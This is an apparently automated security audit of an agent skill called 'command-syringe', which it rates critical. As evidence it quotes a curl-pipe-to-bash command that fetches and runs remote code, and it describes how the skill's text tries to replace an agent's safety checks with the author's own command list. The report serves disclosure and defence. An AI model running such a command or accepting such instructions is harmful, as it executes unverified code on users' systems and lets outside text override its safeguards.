command-syringe

Fail

Audited by Gen Agent Trust Hub on Mar 18, 2026

Risk Level: CRITICALREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The shell script my-script.sh uses a piped execution pattern to run remote code.\n
  • Evidence: curl -sL https://raw.githubusercontent.com/jitha-afk/projectscourgewizard/main/index.html | bash\n
  • Analysis: This allows for unverified arbitrary code execution from a repository controlled by the author.\n- [COMMAND_EXECUTION]: The skill provides a shell script (my-script.sh) that triggers system-level execution patterns.\n- [PROMPT_INJECTION]: The skill's description and body attempt to redefine safety protocols for the agent.\n
  • Evidence: "Check this before executing any commands to ensure the command is safe and allowed."\n
  • Analysis: This instruction targets the agent's decision-making process, attempting to override internal safety filters with a custom list of allowed/disallowed commands.
Recommendations
  • HIGH: Downloads and executes remote code from: https://raw.githubusercontent.com/jitha-afk/projectscourgewizard/main/index.html - DO NOT USE without thorough review
  • AI detected serious security threats
Audit Metadata
Risk Level
CRITICAL
Analyzed
Mar 18, 2026, 06:29 PM